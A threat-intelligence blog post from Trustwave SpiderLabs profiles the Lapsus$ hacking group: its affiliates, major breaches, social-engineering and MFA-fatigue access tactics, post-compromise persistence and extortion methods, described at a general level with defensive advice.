Placing Threat Groups Under a Microscope: Lapsus$
This report is the first in a series of blogs that will delve into the deep research the SpiderLabs Threat Intelligence team conducts daily on the major threat actor groups currently operating globally. The information gathered is part of a data repository to help SpiderLabs identify possible intrusions as it conducts threat hunts, vulnerability scans, and other offensive security tasks.
Lapsus$
Lapsus$ has been very quiet for the last two years and it is widely believed to have disbanded with its members either starting new, moving on to other threat groups, or in prison. Because adversaries tend to be repetitive and use tactics, techniques and procedures (TTPs) that have previously worked, it’s helpful to look back on how Lapsus$ operated when it was fully up and running.
Lapsus$ was a loosely organized international hacking group whose members appeared to have been located in the United Kingdom and Brazil. Lapsus$ was primarily financially motivated, which led it to target large enterprises by stealing their data to sell or use to extort money from its victims. Its list of targets included Microsoft, NVIDIA, Samsung, Vodafone, Okta, Ubisoft, and T-Mobile.
Microsoft also labeled the group Strawberry Tempest and Dev-0537. It primarily targeted organizations in Latin America, Europe, and North America.
Despite being mainly financially driven, Lapsus$ may sometimes had an ideological bent when choosing a target, most notably the Brazilian Ministry of Health. The group had previously expressed its anger at this agency's COVID-19 policies.
Lapsus$ generally operated on its own, but it had several known associated groups:
- Yanluowang: A ransomware-affiliated group that was first discovered in October 2021. The group's Chinese connection is a ruse, as leaks of its chat revealed that members spoke in Russian. Yanluowang is known to target the financial, manufacturing, IT, consultancy, and engineering sectors.
- 0ktapus: A financially motivated group focused on accessing corporate services, stealing crypto-related account information, and stealing source code. Employed a phishing campaign that targeted Okta credentials in 2022.
- Karakurt: Is a subgroup of CONTI. It is a data extortion group that threatens to publicly disclose stolen data and auction it unless the victim pays the ransom.
- Newgen Team: Group that focuses on data exfiltration and ransomware activities. They split from LAPSUS$ in 2022 and created a new tradecraft to complement existing tools.
- #NotLapsus: With known alliances with LAPSUS$ members.
Lapsus$' Best Known Attacks
The first known victim of the Lapsus$ group was the Brazilian Health Ministry which was attacked in December 2021. This action took down multiple systems forcing the Brazilian government to implement new health requirements for travelers. The group posted a message on its website stating it had stolen internal data and for the ministry to contact them to have the data returned.
A few days later, the group removed the message. Aside from the health ministry, the group also attacked Brazil's postal service and Localiza Rent a Car. In October 2022, Brazil Authorities made a key arrest on a person accused of being a member of the Lapsus$ group.
At the start of 2022, Lapsus$ pivoted to targeting high-profile companies, starting with Okta. The group first went after Sitel, an Okta customer to gain access to Okta. The group accessed a Sitel employee's laptop and gave access to 366 Okta customers. The compromise began on January 16, and the group evaded detections and created a malicious email transport rule to forward all mail within Sitel's environment to their accounts.
In February 2022, the group breached NVIDIA and stole 250GB of data containing information on recent GPUs. The group threatened to leak the data if the company refused to remove the limitations on its recent graphic cards.
In March 2022, Lapsus$ began targeting and stealing source code such as the Samsung Galaxy source code and Microsoft's Bing and Cortana. The group mentioned taking 200GB of stolen data from Samsung. Samsung reported that the breach included no personal information of customers and employees. Lapsus$ alleges it stole 37GB of data from Microsoft after accessing a single account.
In March 2022, Ubisoft was allegedly breached by the gang, causing temporary disruption to its services, games, and systems. The Lapsus$ group admitted that it was not targeting Ubisoft customer data. As a precaution, Ubisoft initiated a company-wide password reset.
How Lapsus$ Gains Initial Access
In the same vein as most threat groups, Lapsus$ used various tried and true techniques to gain access to its targets. As noted earlier, it’s important to remain on guard against these methodologies even if Lapsus$ itself is no longer operating.
As a group with advanced social engineering skills, it often relies on phishing and spearphishing attacks and employs SIM card swapping as part of its initial access skillset. Lapsus$ will target employees' mobile phones, especially those with installed authentication apps and SMS phishing. The group is equipped to craft phishing emails to target specific organizations. In its attacks, the group often aims to compromise employees' credentials, which can provide access to critical systems and data.
Additional tactics include:
- Searches for publicly available data about targets, such as employee details, department structures, business processes, workflows, and business relationships. Upon getting substantial information, they can impersonate legitimate personnel and, from there, obtain crucial information on their targets.
- Spamming MFA prompts overwhelm users until they approve the prompt. This is also called MFA fatigue, which occurs unexpectedly, such as at night or inconvenient hours, increasing the chances that an unsuspecting staffer will accept it.
- Impersonate help desk personnel over chat messages and encourage employees to approve MFA prompts.
- Convince employees to navigate malicious websites or download remote access tools to allow threat actors to access remotely and take control of the system.
- Insider Recruitment – Threat actors give off monetary incentives to recruit targeted organization employees. In exchange, the group is given credentials, approved MFA requests, and performs malicious actions instructed by the threat actors.
- Vulnerability Exploitation
- Initial Access Brokers (IABs) — IABs are involved in the theft and sale of access to victim networks. Once they gain access to networks and crucial information, such as passwords and vulnerabilities, is obtained, they sell it in online forums.
These tactics and tools are important for organizations to know and understand as they are a roadmap for how attackers can sneak into their systems. However, foreknowledge of these methods can help companies set up stronger defenses, like using extra security measures for logins, training employees to spot frauds, checking for vulnerabilities often, and keeping an eye out for anything strange happening on their networks to stop attacks before they cause harm.
Understanding how Lapsus$ functions can also lead an organization to the conclusion that it cannot properly secure itself from these types of attacks and offer some direction on where to go for outside assistance.
Post Access Actions
Once inside their target, Lapsus$ had a well-stocked arsenal for privilege escalation, lateral movement, and maintaining persistence.
Lapsus$ gains privilege escalation through improperly stored passwords and keys it finds once inside a system. Unfortunately, employees often store their credentials in plaintext without the use of a password manager. Threat actors take advantage of this error and, by using legitimate accounts and credentials, their activities will appear as legitimate user behavior in the forensic record.
Another method of privilege escalation and lateral movement is using common tools. Tools used for credential dumping can obtain higher privileges and leverage internal communication channels to impersonate employees and conduct internal social engineering attacks. Lastly, threat actors also use compromised AWS tokens.
Lapsus$ was also known to exploit vulnerabilities for privilege escalation. Threat actors can leverage well-known vulnerabilities to elevate privileges, such as those in Microsoft's Active Directory, Microsoft Exchange Servers, Confluence, Jira, and GitLab.
Lapsus$ often gained persistence by creating accounts within the victim's organization to stay inside the network. Additionally, it can obtain persistence through legitimate and malicious remote access tools, such as reverse SSH (Secure Shell), reverse proxy, ngrok, and rsocx to maintain communications. It also employs legitimate tools such as AnyDesk, LogMeIn, TeamViewer, and ThinScale. Lastly, they can install malware such as Remote Access Trojans.
Finally, Lapsus$ was adept at disabling security monitoring tools. The group has employed attacks to bypass security detection and disable security mechanisms, and by modifying the firewall to allow remote connections.
Final Impact of Lapsus$'s Actions
As previously stated, Lapsus$ primarily attacks for financial gain. To accomplish this goal, it uses various methods, including almost all the well-known threat group schemes.
The first is the theft and compromise of data. In many instances, the group has stolen crucial data from its victims. This has multiple uses, including for extortion, ransom, and harassment purposes. For example, if the victim does not comply with a ransom demand, the group can either directly sell the stolen information in underground forums, or it can threaten to release the data publicly to place additional pressure on the victim to comply. This tactic is called the double-extortion method.
Illegal access can cause network service disruptions, such as website defacement, destruction of cloud environments, disruption of services, and disabling of internal systems.
The group can also use the information gained during lateral movement and privilege escalation for harassment. Organizations responding to these incidents experience harassment to retaliate, stop investigations, and silence researchers. They do this by publishing researchers' personal information and conducting swatting attacks toward them and their families.
By understanding Lapsus$'s methods, organizations can take proactive steps to mitigate the risk of being targeted.
In future installments of this series, SpiderLabs Threat Intelligence will delve deeper into other prominent threat actor groups, providing even more insights to help organizations fortify their cybersecurity posture.
ABOUT TRUSTWAVE
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.